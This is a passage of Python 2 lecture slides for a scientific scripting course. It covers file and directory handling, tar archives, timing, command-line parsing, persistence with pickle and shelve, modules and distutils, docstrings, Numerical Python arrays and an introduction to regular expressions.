        # io1: input and output variable
        ...
        # pack all output variables in a tuple:
        return io1, o1, o2, o3
    
    # usage:
    a, b, c, d = myfunc(e, f, g, h, a)
    

  • Only (a kind of) references to objects are transferred so returning a large data structure implies just returning a reference



    Scope of variables

    Variables defined inside the function are local
    To change global variables, these must be declared as global inside the function
    s = 1
    
    def myfunc(x, y):
        z = 0  # local variable, dies when we leave the func.
        global s
        s = 2  # assignment requires decl. as global
        return y-1,z+1
    
    Variables can be global, local (in func.), and class attributes
    The scope of variables in nested functions may confuse newcomers (see ch. 8.7 in the course book)



    File globbing

    List all .ps and .gif files (Unix):
    ls *.ps *.gif
    
    Cross-platform way to do it in Python:
    import glob
    filelist = glob.glob('*.ps') + glob.glob('*.gif')
    
    This is referred to as file globbing



    Testing file types

    import os.path
    print myfile,
    
    if os.path.isfile(myfile):
         print 'is a plain file'
    if os.path.isdir(myfile):
         print 'is a directory'
    if os.path.islink(myfile):
         print 'is a link'
    
    # the size and age:
    size = os.path.getsize(myfile)
    time_of_last_access       = os.path.getatime(myfile)
    time_of_last_modification = os.path.getmtime(myfile)
    
    # times are measured in seconds since 1970.01.01
    days_since_last_access = \
    (time.time() - os.path.getatime(myfile))/(3600*24)
    



    More detailed file info

    import stat
    
    myfile_stat = os.stat(myfile)
    filesize = myfile_stat[stat.ST_SIZE]
    mode = myfile_stat[stat.ST_MODE]
    if stat.S_ISREG(mode):
        print '%(myfile)s is a regular file '\
              'with %(filesize)d bytes' % vars()
    
    Check out the stat module in Python Library Reference



    Copy, rename and remove files

    Copy a file:
    import shutil
    shutil.copy(myfile, tmpfile)
    
    Rename a file:
    os.rename(myfile, 'tmp.1')
    
    Remove a file:
    os.remove('mydata')
    # or os.unlink('mydata')
    



    Path construction

    Cross-platform construction of file paths:
    filename = os.path.join(os.pardir, 'src', 'lib')
    
    # Unix:    ../src/lib
    # Windows: ..\src\lib
    
    shutil.copy(filename, os.curdir)
    
    # Unix:  cp ../src/lib .
    
    # os.pardir : ..
    # os.curdir : .
    



    Directory management

    Creating and moving to directories:
    dirname = 'mynewdir'
    if not os.path.isdir(dirname):
        os.mkdir(dirname) # or os.mkdir(dirname,'0755')
    os.chdir(dirname)
    
    Make complete directory path with intermediate directories:
    path = os.path.join(os.environ['HOME'],'py','src')
    os.makedirs(path)
    
    # Unix: mkdirhier $HOME/py/src
    
    Remove a non-empty directory tree:
    shutil.rmtree('myroot')
    



    Basename/directory of a path

    Given a path, e.g.,
    fname = '/home/hpl/scripting/python/intro/hw.py'
    
    Extract directory and basename:
    # basename: hw.py
    basename = os.path.basename(fname)
    
    # dirname: /home/hpl/scripting/python/intro
    dirname  = os.path.dirname(fname)
    
    # or
    dirname, basename = os.path.split(fname)
    
    Extract suffix:
    root, suffix = os.path.splitext(fname)
    # suffix: .py
    



    Platform-dependent operations

    The operating system interface in Python is the same on Unix, Windows and Mac
    Sometimes you need to perform platform-specific operations, but how can you make a portable script?
    # os.name       : operating system name
    # sys.platform  : platform identifier
    
    # cmd:  string holding command to be run
    if os.name == 'posix':            # Unix?
        failure, output = commands.getstatusoutput(cmd + '&')
    elif sys.platform[:3] == 'win':   # Windows?
        failure, output = commands.getstatusoutput('start ' + cmd)
    else:
        # foreground execution:
        failure, output = commands.getstatusoutput(cmd)
    



    Traversing directory trees (1)

    Run through all files in your home directory and list files that are larger than 1 Mb
    A Unix find command solves the problem:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \;
    
    This (and all features of Unix find) can be given a cross-platform implementation in Python



    Traversing directory trees (2)

    Similar cross-platform Python tool:
    root = os.environ['HOME']  # my home directory
    os.path.walk(root, myfunc, arg)
    
    walks through a directory tree (root) and calls, for each directory dirname,
    myfunc(arg, dirname, files)  # files is list of (local) filenames
    
    arg is any user-defined argument, e.g. a nested list of variables



    Example on finding large files

    def checksize1(arg, dirname, files):
        for file in files:
            # construct the file's complete path:
            filename = os.path.join(dirname, file)
            if os.path.isfile(filename):
                size = os.path.getsize(filename)
                if size > 1000000:
                    print '%.2fMb %s' % (size/1000000.0,filename)
                
    root = os.environ['HOME']
    os.path.walk(root, checksize1, None)
    
    # arg is a user-specified (optional) argument,
    # here we specify None since arg has no use
    # in the present example
    



    Make a list of all large files

  • Slight extension of the previous example

  • Now we use the arg variable to build a list during the walk
    def checksize1(arg, dirname, files):
        for file in files:
            filepath = os.path.join(dirname, file)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > 1000000:
                    size_in_Mb = size/1000000.0
                    arg.append((size_in_Mb, filename))
                
    bigfiles = []
    root = os.environ['HOME']
    os.path.walk(root, checksize1, bigfiles)
    for size, name in bigfiles:
        print name, 'is', size, 'Mb'
    



    arg must be a list or dictionary

  • Let's build a tuple of all files instead of a list:
    def checksize1(arg, dirname, files):
        for file in files:
            filepath = os.path.join(dirname, file)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > 1000000:
                    msg = '%.2fMb %s' % (size/1000000.0, filepath)
                    arg = arg + (msg,)
    
    bigfiles = []
    os.path.walk(os.environ['HOME'], checksize1, bigfiles)
    for size, name in bigfiles:
        print name, 'is', size, 'Mb'
    

  • Now bigfiles is an empty list! Why? Explain in detail... (Hint: arg must be mutable)



    Creating Tar archives

  • Tar is a widepsread tool for packing file collections efficiently

  • Very useful for software distribution or sending (large) collections of files in email

  • Demo:
    >>> import tarfile
    >>> files = 'NumPy_basics.py', 'hw.py', 'leastsquares.py'
    >>> tar = tarfile.open('tmp.tar.gz', 'w:gz')  # gzip compression
    >>> for file in files:
    ...     tar.add(file)
    ...
    >>> # check what's in this archive:
    >>> members = tar.getmembers()  # list of TarInfo objects
    >>> for info in members:
    ...     print '%s: size=%d, mode=%s, mtime=%s' % \
    ...           (info.name, info.size, info.mode,
    ...            time.strftime('%Y.%m.%d', time.gmtime(info.mtime)))
    ...
    NumPy_basics.py: size=11898, mode=33261, mtime=2004.11.23
    hw.py: size=206, mode=33261, mtime=2005.08.12
    leastsquares.py: size=1560, mode=33261, mtime=2004.09.14
    >>> tar.close()
    

  • Compressions: uncompressed (w:), gzip (w:gz), bzip2 (w:bz2)



    Reading Tar archives

    >>> tar = tarfile.open('tmp.tar.gz', 'r')
    >>>
    >>> for file in tar.getmembers():
    ...     tar.extract(file)       # extract file to current work.dir.
    ...
    >>> # do we have all the files?
    >>> allfiles = os.listdir(os.curdir)
    >>> for file in allfiles:
    ...     if not file in files:  print 'missing', file
    ...
    >>> hw = tar.extractfile('hw.py')  # extract as file object
    >>> hw.readlines()
    



    Measuring CPU time (1)

    The time module:
    import time
    e0 = time.time()     # elapsed time since the epoch
    c0 = time.clock()    # total CPU time spent so far
    # do tasks...
    elapsed_time = time.time() - e0
    cpu_time = time.clock() - c0
    
    The os.times function returns a list:
    os.times()[0]  : user   time, current process
    os.times()[1]  : system time, current process
    os.times()[2]  : user   time, child processes
    os.times()[3]  : system time, child processes
    os.times()[4]  : elapsed time
    
    CPU time = user time + system time



    Measuring CPU time (2)

    Application:
    t0 = os.times()
    # do tasks...
    os.system(time_consuming_command) # child process
    t1 = os.times()
    
    elapsed_time = t1[4] - t0[4]
    user_time    = t1[0] - t0[0]
    system_time  = t1[1] - t0[1]
    cpu_time     = user_time + system_time
    cpu_time_system_call = t1[2]-t0[2] + t1[3]-t0[3]
    
    There is a special Python profiler for finding bottlenecks in scripts (ranks functions according to their CPU-time consumption)



    A timer function

    Let us make a function timer for measuring the efficiency of an arbitrary function. timer takes 4 arguments:

    a function to call
    a list of arguments to the function
    number of calls to make (repetitions)
    name of function (for printout)
    def timer(func, args, repetitions, func_name):
        t0 = time.time();  c0 = time.clock()
    
        for i in range(repetitions):
            func(*args)  # old style: apply(func, args)
    
        print '%s: elapsed=%g, CPU=%g' % \
        (func_name, time.time()-t0, time.clock()-c0)
    



    Parsing command-line arguments

    Running through sys.argv[1:] and extracting command-line info 'manually' is easy
    Using standardized modules and interface specifications is better!
    Python's getopt and optparse modules parse the command line
    getopt is the simplest to use
    optparse is the most sophisticated



    Short and long options

    It is a 'standard' to use either short or long options
    -d dirname           # short options -d and -h
    --directory dirname  # long options --directory and --help
    
    Short options have single hyphen,
    long options have double hyphen
    Options can take a value or not:
    --directory dirname --help --confirm
    -d dirname -h -i
    
    Short options can be combined
    -iddirname   is the same as  -i -d dirname
    



    Using the getopt module (1)

    Specify short options by the option letters, followed by colon if the option requires a value
    Example: 'id:h'
    Specify long options by a list of option names, where names must end with = if the require a value
    Example: ['help','directory=','confirm']



    Using the getopt module (2)

    getopt returns a list of (option,value) pairs and a list of the remaining arguments
    Example:
    --directory mydir -i file1 file2
    
    makes getopt return
    [('--directory','mydir'), ('-i','')]
    ['file1','file2]'
    



    Using the getopt module (3)

    Processing:
    import getopt
    try:
        options, args = getopt.getopt(sys.argv[1:], 'd:hi',
                        ['directory=', 'help', 'confirm'])
    except:
        # wrong syntax on the command line, illegal options,
        # missing values etc.
    
    directory = None; confirm = 0  # default values
    for option, value in options:
        if option in ('-h', '--help'):
            # print usage message
        elif option in ('-d', '--directory'):
            directory = value
        elif option in ('-i', '--confirm'):
            confirm = 1
    



    Using the interface

    Equivalent command-line arguments:
    -d mydir --confirm src1.c src2.c
    --directory mydir -i src1.c src2.c
    --directory=mydir --confirm src1.c src2.c
    
    Abbreviations of long options are possible, e.g.,
    --d mydir --co
    
    This one also works: -idmydir



    Writing Python data structures

    Write nested lists:
    somelist = ['text1', 'text2']
    a = [[1.3,somelist], 'some text']
    f = open('tmp.dat', 'w')
    
    # convert data structure to its string repr.:
    f.write(str(a))  
    f.close()
    
    Equivalent statements writing to standard output:
    print a
    sys.stdout.write(str(a) + '\n')
    
    # sys.stdin        standard input as file object
    # sys.stdout       standard input as file object
    



    Reading Python data structures

    eval(s): treat string s as Python code
    a = eval(str(a)) is a valid 'equation' for basic Python data structures
    Example: read nested lists
    f = open('tmp.dat', 'r')  # file written in last slide
    # evaluate first line in file as Python code:
    newa = eval(f.readline())
    
    results in
    [[1.3, ['text1', 'text2']], 'some text']
    
    # i.e.
    newa = eval(f.readline())
    # is the same as
    newa = [[1.3, ['text1', 'text2']], 'some text']
    



    Remark about str and eval

    str(a) is implemented as an object function
    __str__
    
    repr(a) is implemented as an object function
    __repr__
    
    str(a): pretty print of an object
    repr(a): print of all info for use with eval
    a = eval(repr(a))
    str and repr are identical for standard Python objects (lists, dictionaries, numbers)



    Persistence

    Many programs need to have persistent data structures, i.e., data live after the program is terminated and can be retrieved the next time the program is executed
    str, repr and eval are convenient for making data structures persistent
    pickle, cPickle and shelve are other (more sophisticated) Python modules for storing/loading objects



    Pickling

    Write any set of data structures to file using the cPickle module:
    f = open(filename, 'w')
    import cPickle
    cPickle.dump(a1, f)
    cPickle.dump(a2, f)
    cPickle.dump(a3, f)
    f.close()
    
    Read data structures in again later:
    f = open(filename, 'r')
    a1 = cPickle.load(f)
    a2 = cPickle.load(f)
    a3 = cPickle.load(f)
    



    Shelving

    Think of shelves as dictionaries with file storage
    import shelve
    database = shelve.open(filename)
    database['a1'] = a1  # store a1 under the key 'a1'
    database['a2'] = a2
    database['a3'] = a3
    # or
    database['a123'] = (a1, a2, a3)
    
    # retrieve data:
    if 'a1' in database:
        a1 = database['a1']
    # and so on
    
    # delete an entry:
    del database['a2']
    
    database.close()
    



    What assignment really means

    >>> a = 3           # a refers to int object with value 3
    >>> b = a           # b refers to a (int object with value 3)
    >>> id(a), id(b )   # print integer identifications of a and b
    (135531064, 135531064)
    >>> id(a) == id(b)  # same identification?
    True                # a and b refer to the same object
    >>> a is b          # alternative test
    True
    >>> a = 4           # a refers to a (new) int object
    >>> id(a), id(b)    # let's check the IDs
    (135532056, 135531064)
    >>> a is b
    False
    >>> b     # b still refers to the int object with value 3
    3
    



    Assignment vs in-place changes

    >>> a = [2, 6]     # a refers to a list [2, 6]
    >>> b = a          # b refers to the same list as a
    >>> a is b
    True
    >>> a = [1, 6, 3]  # a refers to a new list
    >>> a is b
    False
    >>> b              # b still refers to the old list
    [2, 6]
    
    >>> a = [2, 6]
    >>> b = a
    >>> a[0] = 1       # make in-place changes in a 
    >>> a.append(3)    # another in-place change
    >>> a
    [1, 6, 3]
    >>> b
    [1, 6, 3]
    >>> a is b         # a and b refer to the same list object
    True
    



    Assignment with copy

    What if we want b to be a copy of a?
    Lists: a[:] extracts a slice, which is a copy of all elements:
    >>> b = a[:]   # b refers to a copy of elements in a
    >>> b is a
    False
    
    In-place changes in a will not affect b
    Dictionaries: use the copy method:
    >>> a = {'refine': False}
    >>> b = a.copy()
    >>> b is a
    False
    
    In-place changes in a will not affect b



    Third-party Python modules

    Parnassus is a large collection of Python modules, see link from www.python.org
    Do not reinvent the wheel, search Parnassus!





    Python modules




    Contents

    Making a module
    Making Python aware of modules
    Packages
    Distributing and installing modules



    More info

    Appendix B.1 in the course book
    Python electronic documentation:
    Distributing Python Modules, Installing Python Modules



    Make your own Python modules!

    Reuse scripts by wrapping them in classes or functions
    Collect classes and functions in library modules
    How? just put classes and functions in a file MyMod.py
    Put MyMod.py in one of the directories where Python can find it (see next slide)
    Say
    import MyMod
    # or
    import MyMod as M   # M is a short form
    # or
    from MyMod import *
    # or
    from MyMod import myspecialfunction, myotherspecialfunction
    
    in any script



    How Python can find your modules

    Python has some 'official' module directories, typically
    /usr/lib/python2.3
    /usr/lib/python2.3/site-packages
    
    + current working directory
    The environment variable PYTHONPATH may contain additional directories with modules
    unix> echo $PYTHONPATH
    /home/me/python/mymodules:/usr/lib/python2.2:/home/you/yourlibs
    
    Python's sys.path list contains the directories where Python searches for modules
    sys.path contains 'official' directories, plus those in PYTHONPATH)



    Setting PYTHONPATH

    In a Unix Bash environment environment variables are normally set in .bashrc:
    export PYTHONTPATH=$HOME/pylib:$scripting/src/tools
    
    Check the contents:
    unix> echo $PYTHONPATH
    
    In a Windows environment one can do the same in autoexec.bat:
    set PYTHONPATH=C:\pylib;%scripting%\src\tools
    
    Check the contents:
    dos> echo %PYTHONPATH%
    
    Note: it is easy to make mistakes; PYTHONPATH may be different from what you think, so check sys.path



    Summary of finding modules

    Copy your module file(s) to a directory already contained in sys.path
    unix or dos> python -c 'import sys; print sys.path' 
    
    Can extend PYTHONPATH
    # Bash syntax:
    export PYTHONPATH=$PYTHONPATH:/home/me/python/mymodules
    
    Can extend sys.path in the script:
    sys.path.insert(0, '/home/me/python/mynewmodules')
    
    (insert first in the list)



    Packages (1)

    A class of modules can be collected in a package
    Normally, a package is organized as module files in a directory tree
    Each subdirectory has a file __init__.py
    (can be empty)
    Packages allow ``dotted modules names'' like
    MyMod.numerics.pde.grids
    
    reflecting a file MyMod/numerics/pde/grids.py



    Packages (2)

    Can import modules in the tree like this:
    from MyMod.numerics.pde.grids import fdm_grids
    
    grid = fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    ...
    
    Here, class fdm_grids is in module grids (file grids.py) in the directory MyMod/numerics/pde
    Or
    import MyMod.numerics.pde.grids
    grid = MyMod.numerics.pde.grids.fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    #or
    import MyMod.numerics.pde.grids as Grid
    grid = Grid.fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    
    See ch. 6 of the Python Tutorial (part of the electronic doc)



    Test/doc part of a module

    Module files can have a test/demo script at the end:
    if __name__ == '__main__':
        infile = sys.argv[1]; outfile = sys.argv[2]
        for i in sys.argv[3:]:
            create(infile, outfile, i)
    
    The block is executed if the module file is run as a script
    The tests at the end of a module often serve as good examples on the usage of the module



    Public/non-public module variables

    Python convention: add a leading underscore to non-public functions and (module) variables
    _counter = 0
    
    def _filename():
        """Generate a random filename."""
        ...
    
    After a standard import import MyMod, we may access
    MyMod._counter
    n = MyMod._filename()
    
    but after a from MyMod import * the names with leading underscore are not available
    Use the underscore to tell users what is public and what is not
    Note: non-public parts can be changed in future releases



    Installation of modules/packages

    Python has its own build/installation system: Distutils
    Build: compile (Fortran, C, C++) into module
    (only needed when modules employ compiled code)
    Installation: copy module files to ``install'' directories
    Publish: make module available for others through PyPi
    Default installation directory:
    os.path.join(sys.prefix, 'lib', 'python' + sys.version[0:3],
                 'site-packages')
    # e.g. /usr/lib/python2.3/site-packages
    
    Distutils relies on a setup.py script



    A simple setup.py script

    Say we want to distribute two modules in two files
    MyMod.py  mymodcore.py
    
    Typical setup.py script for this case:
    #!/usr/bin/env python
    from distutils.core import setup
    
    setup(name='MyMod',
          version='1.0',
          description='Python module example',
          author='Hans Petter Langtangen',
          author_email='hpl@ifi.uio.no',
          url='http://www.simula.no/pymod/MyMod',
          py_modules=['MyMod', 'mymodcore'],
         )
    



    setup.py with compiled code

    Modules can also make use of Fortran, C, C++ code
    setup.py can also list C and C++ files; these will be compiled with the same options/compiler as used for Python itself
    SciPy has an extension of Distutils for ``intelligent'' compilation of Fortran files
    Note: setup.py eliminates the need for makefiles
    Examples of such setup.py files are provided in the section on mixing Python with Fortran, C and C++



    Installing modules

    Standard command:
    python setup.py install
    
    If the module contains files to be compiled, a two-step procedure can be invoked
    python setup.py build
    # compiled files and modules are made in subdir. build/
    python setup.py install
    



    Controlling the installation destination

    setup.py has many options
    Control the destination directory for installation:
    python setup.py install --home=$HOME/install
    # copies modules to /home/hpl/install/lib/python
    
    Make sure that /home/hpl/install/lib/python is registered in your PYTHONPATH



    How to learn more about Distutils

    Go to the official electronic Python documentation
    Look up ``Distributing Python Modules''
    (for packing modules in setup.py scripts)
    Look up ``Installing Python Modules''
    (for running setup.py with various options)





    Doc strings




    Contents

  • How to document usage of Python functions, classes, modules

  • Automatic testing of code (through doc strings)



    More info

    App. B.1/B.2 in the course book
    HappyDoc, Pydoc, Epydoc manuals
    Style guide for doc strings (see doc.html)



    Doc strings (1)

    Doc strings = first string in functions, classes, files
    Put user information in doc strings:
    def ignorecase_sort(a, b):
        """Compare strings a and b, ignoring case."""
        ...
    
    The doc string is available at run time and explains the purpose and usage of the function:
    >>> print ignorecase_sort.__doc__
    'Compare strings a and b, ignoring case.'
    



    Doc strings (2)

    Doc string in a class:
    class MyClass:
        """Fake class just for exemplifying doc strings."""
        
        def __init__(self):
           ...
    
    Doc strings in modules are a (often multi-line) string starting in the top of the file
    """
    This module is a fake module
    for exemplifying multi-line
    doc strings.
    """
    



    Doc strings (3)

    The doc string serves two purposes:

    documentation in the source code
    on-line documentation through the attribute
    __doc__
    
    documentation generated by, e.g., HappyDoc
    HappyDoc: Tool that can extract doc strings and automatically produce overview of Python classes, functions etc.
    Doc strings can, e.g., be used as balloon help in sophisticated GUIs (cf. IDLE)
    Providing doc strings is a good habit!



    Doc strings (4)

    There is an official style guide for doc strings:

    PEP 257 "Docstring Conventions" from http://www.python.org/dev/peps/
    Use triple double quoted strings as doc strings
    Use complete sentences, ending in a period
    def somefunc(a, b):
        """Compare a and b."""
    



    Automatic doc string testing (1)

    The doctest module enables automatic testing of interactive Python sessions embedded in doc strings
    class StringFunction:
        """
        Make a string expression behave as a Python function
        of one variable.
        Examples on usage:
        >>> from StringFunction import StringFunction
        >>> f = StringFunction('sin(3*x) + log(1+x)')
        >>> p = 2.0; v = f(p)  # evaluate function
        >>> p, v
        (2.0, 0.81919679046918392)
        >>> f = StringFunction('1+t', independent_variables='t')
        >>> v = f(1.2)  # evaluate function of t=1.2
        >>> print "%.2f" % v
        2.20
        >>> f = StringFunction('sin(t)')
        >>> v = f(1.2)  # evaluate function of t=1.2
        Traceback (most recent call last):
            v = f(1.2)
        NameError: name 't' is not defined
        """
    



    Automatic doc string testing (2)

    Class StringFunction is contained in the module StringFunction
    Let StringFunction.py execute two statements when run as a script:
    def _test():
        import doctest, StringFunction
        return doctest.testmod(StringFunction)
    
    if __name__ == '__main__':
        _test()
    
    Run the test:
    python StringFunction.py       # no output: all tests passed
    python StringFunction.py  -v   # verbose output
    





    Numerical Python




    Contents

    Efficient array computing in Python
    Creating arrays
    Indexing/slicing arrays
    Random numbers
    Linear algebra



    More info

    Ch. 4 in the course book
    Numeric, numarray, or numpy manual



    Numerical Python (NumPy)

    NumPy enables efficient numerical computing in Python
    NumPy is a Python/C package which offers efficient arrays (contiguous storage) and mathematical operations in C
    Classic and widely used Numeric module:
    from Numeric import *
    
    Numarray alternative:
    from numarray import *
    
    numpy - a third ``replacement'' implementation:
    from numpy import *
    
    Numerical Python contains other modules as well - these have slightly different names and features in the three implementations :-(



    py4cs.numpytools

    Most probably we will have to live with three implementations
    We have made a small interface layer (module) numpytools and added some extra functions
    from py4cs.numpytools import *
    
    This module allows a unified interface to Numeric, numarray, and numpy - based on recommending ``the least common denominator'' principle (use only functionality that are present in all three packages)



    NumPy: making arrays

    from py4cs.numpytools import *
    # or from Numeric import *  # or from numpy import *
    
    # create an array a of length n, with zeroes and
    # double precision float type:
    a = zeros(n, Float)
    
    # create an array x with values from -5 to 4.5 in steps of 0.5:
    x = arrayrange(-5, 5, 0.5, Float) 
    # better: use sequence from py4cs.numpytools (5 is included):
    x = sequence(-5, 5, 0.5) # -5, -4.5, ..., 5.0
    
    # it is trivial to make accompanying y values:
    y = sin(x/2.0)*3.0
    
    # create a NumPy array from a Python list:
    pl = [0, 1.2, 4, -9.1, 5, 8]
    a = array(pl, typecode=Float)  # (can omit typecode)
    
    a.shape = (2,3) # turn a into a 2x3 matrix
    a.shape = (size(a),)   # back to vector
    



    NumPy: computing with arrays

    b = 3*a - 1
    
    # in-place (memory saving) alternative:
    b = a
    multiply(b, 3, b)  # b = 3*b
    subtract(b, 1, b)  # b = b -1 
    
    # standard mathematical functions:
    c = sin(b)    
    c = arcsin(c) 
    c = sinh(b)
    c = b**2.5  # power function
    c = log(b)
    c = sqrt(b)
    
    # subscripting:
    a[2:4] = -1      # set a[2] and a[3] to -1
    a[-1]  = a[0]    # set last element equal to first one
    a.shape = (3,2)
    print a[:,0]     # print first column
    print a[:,1::2]  # print second column with stride 2
    



    Warning: arange/arrayrange is unreliable (1)

    arange and arrayrange (synonym) are supposed not to include the upper limit (like range and xrange)
    Try out
    nerrors = 0
    for n in range(1, 101):
        x1 = arange(0, 1, 1./n)[-1]  # should be less than 1
        print n, x1
        if x1 == 1.0: nerrors += 1
    print 'leading to', nerrors, 'unexpected cases'
    
    58 (random!) cases out of 100 gave unexpected behavior!



    Warning: arange/arrayrange is unreliable (2)

    Stay away from arange and arrayrange, use seq (or emp{sequence}) and iseq (or isequence) from numpytools instead:
    from py4cs.numpytools import *
    x = seq(0, 1, 1./n)
    I = iseq(0, 100, 2)       # includes 100
    
    numpy.linspace is a similar alternative



    NumPy: random numbers

    Random number generation:
    from Numeric import *
    
    RandomArray.seed(1928,1277) # set seed
    # seed() provides a seed based on current time
    print 'mean of %d random uniform random numbers:' % n
    
    u = RandomArray.random(n)  # uniform numbers on (0,1)
    print 'on (0,1):', sum(u)/n, '(should be 0.5)'
    
    u = RandomArray.uniform(-1,1,n) # uniform numbers on (-1,1)
    print 'on (-1,1):', sum(u)/n, '(should be 0)'
    
    mean = 0.0; stdev = 1.0
    u = RandomArray.normal(mean, stdev, n)
    m = sum(u)/n  # empirical mean
    s = sqrt(sum((u - m)**2)/(n-1))  # empirical st.dev.
    print 'generated %d N(0,1) samples with\nmean %g '\
          'and st.dev. %g using RandomArray.normal' % (n, m, s)
    



    NumPy example

    Continuation of last slide
    Find the probability that normal samples are less than 1.5:
    u = RandomArray.normal(mean, stdev, n)
    
    less_than = u < 1.5
    
    # (less_than[i] is 1 if u[i]<0, otherwise 0, i.e.
    #  less_than is an array like (0,0,1,1,0,0,1,0,...0,1,0)
    
    p = sum(less_than)
    prob = p/float(n)
    
    print "probability=%.2f" % prob
    
    Vectorized operations give high efficiency, but requires a different way of thinking



    Python + Matlab = true

    A Python module, pymat, enables communication with Matlab:
    from Numeric import *
    import pymat
    
    x = arrayrange(0, 4*math.pi, 0.1)
    m = pymat.open()
    # can send NumPy arrays to Matlab:
    pymat.put(m, 'x', x);
    pymat.eval(m, 'y = sin(x)')
    pymat.eval(m, 'plot(x,y)')
    # get a new NumPy array back:
    y = pymat.get(m, 'y')
    





    Regular expressions




    Contents

    Motivation for regular expression
    Regular expression syntax
    Lots of examples on problem solving with regular expressions
    Many examples related to scientific computations



    More info

    Ch. 8.2 in the course book
    Regular Expression HOWTO for Python (see doc.html)
    perldoc perlrequick (intro), perldoc perlretut (tutorial), perldoc perlre (full reference)
    ``Text Processing in Python'' by Mertz (Python syntax)
    ``Mastering Regular Expressions'' by Friedl (Perl syntax)
    Note: the core syntax is the same in Perl, Python, Ruby, Tcl, Egrep, Vi/Vim, Emacs, ..., so books about these tools also provide info on regular expressions



    Motivation

    Consider a simulation code with this type of output:
    t=2.5  a: 1.0 6.2 -2.2   12 iterations and eps=1.38756E-05
    t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
    >> switching from method AQ4 to AQP1
    t=5  a: 0.9   2 iterations and eps=3.78796E-05
    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    >> switching from method AQP1 to AQ2
    t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
    ...
    
    You want to make two graphs:

    iterations vs t
    eps vs t
    How can you extract the relevant numbers from the text?



    Regular expressions

    Some structure in the text, but line.split() is too simple (different no of columns/words in each line)
    Regular expressions constitute a powerful language for formulating structure and extract parts of a text
    Regular expressions look cryptic for the novice
    regex/regexp: abbreviations for regular expression



    Specifying structure in a text

    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    

    Structure: t=, number, 2 blanks, a:, some numbers, 3 blanks, integer, ' iterations and eps=', number
    Regular expressions constitute a language for specifying such structures
    Formulation in terms of a regular expression:
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    



    Dissection of the regex

    A regex usually contains special characters introducing freedom in the text:
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    
    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    
    .          any character
    .*         zero or more . (i.e. any sequence of characters)
    (.*)       can extract the match for .* afterwards
    \s         whitespace (spacebar, newline, tab)
    \s{2}      two whitespace characters
    a:         exact text
    .*         arbitrary text
    \s+        one or more whitespace characters
    \d+        one or more digits (i.e. an integer)
    (\d+)      can extract the integer later
    iterations and eps=     exact text
    



    Using the regex in Python code

    pattern = \
    r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"
    
    t = []; iterations = []; eps = []
    
    # the output to be processed is stored in the list of lines
    
    for line in lines:
    
        match = re.search(pattern, line)
    
        if match:
            t.append         (float(match.group(1)))
            iterations.append(int  (match.group(2)))
            eps.append       (float(match.group(3)))
    



    Result

    Output text to be interpreted:
    t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
    t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
    >> switching from method AQ4 to AQP1
    t=5  a: 0.9   2 iterations and eps=3.78796E-05
    t=6.386  a: 1 1.15   6 iterations and eps=2.22433E-06
    >> switching from method AQP1 to AQ2
    t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
    
    Extracted Python lists:
    t = [2.5, 4.25, 5.0, 6.386, 8.05]
    iterations = [12, 6, 2, 6, 3]
    eps = [1.38756e-05, 2.22433e-05, 3.78796e-05, 
           2.22433e-06, 9.11111E-04]
    



    Another regex that works

    Consider the regex
    t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)
    
    compared with the previous regex
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    
    Less structure
    How 'exact' does a regex need to be?
    The degree of preciseness depends on the probability of making a wrong match



    Failure of a regex

    Suppose we change the regular expression to
    t=(.*)\s+a:.*(\d+).*=(.*)
    
    It works on most lines in our test text but not on
    t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
    
    2 instead of 12 (iterations) is extracted
    (why? see later)
    Regular expressions constitute a powerful tool, but you need to develop understanding and experience



    List of special regex characters

    .       # any single character except a newline
    ^       # the beginning of the line or string
    $       # the end of the line or string
    *       # zero or more of the last character
    +       # one or more of the last character
    ?       # zero or one of the last character
    
    [A-Z]   # matches all upper case letters
    [abc]   # matches either a or b or c
    [^b]    # does not match b
    [^a-z]  # does not match lower case letters
    



    Context is important

    .*    # any sequence of characters (except newline)
    [.*]  # the characters . and *
    
    ^no   # the string 'no' at the beginning of a line
    [^no] # neither n nor o
    
    A-Z   # the 3-character string 'A-Z' (A, minus, Z)
    [A-Z] # one of the chars A, B, C, ..., X, Y, or Z
    



    More weird syntax...

    The OR operator:
    (eg|le)gs  # matches eggs or legs
    
    Short forms of common expressions:
    \n     # a newline
    \t     # a tab
    \w     # any alphanumeric (word) character
           # the same as [a-zA-Z0-9_]
    \W     # any non-word character
           # the same as [^a-zA-Z0-9_]
    \d     # any digit, same as [0-9]
    \D     # any non-digit, same as [^0-9]
    \s     # any whitespace character: space,
           # tab, newline, etc
    \S     # any non-whitespace character
    \b     # a word boundary, outside [] only
    \B     # no word boundary
    



    Quoting special characters

    \.     # a dot
    \|     # vertical bar
    \[     # an open square bracket
    \)     # a closing parenthesis
    \*     # an asterisk
    \^     # a hat
    \/     # a slash
    \\     # a backslash
    \{     # a curly brace
    \?     # a question mark
    



    GUI for regex testing

    src/tools/regexdemo.py:

    The part of the string that matches the regex is high-lighted



    Regex for a real number

    Different ways of writing real numbers:
    -3, 42.9873, 1.23E+1, 1.2300E+01, 1.23e+01
    Three basic forms:

    integer: -3
    decimal notation: 42.9873, .376, 3.
    scientific notation: 1.23E+1, 1.2300E+01, 1.23e+01, 1e1



    A simple regex

    Could just collect the legal characters in the three notations:
    [0-9.Ee\-+]+
    
    Downside: this matches text like
    12-24
    24.-
    --E1--
    +++++
    
    How can we define precise regular expressions for the three notations?



    Decimal notation regex

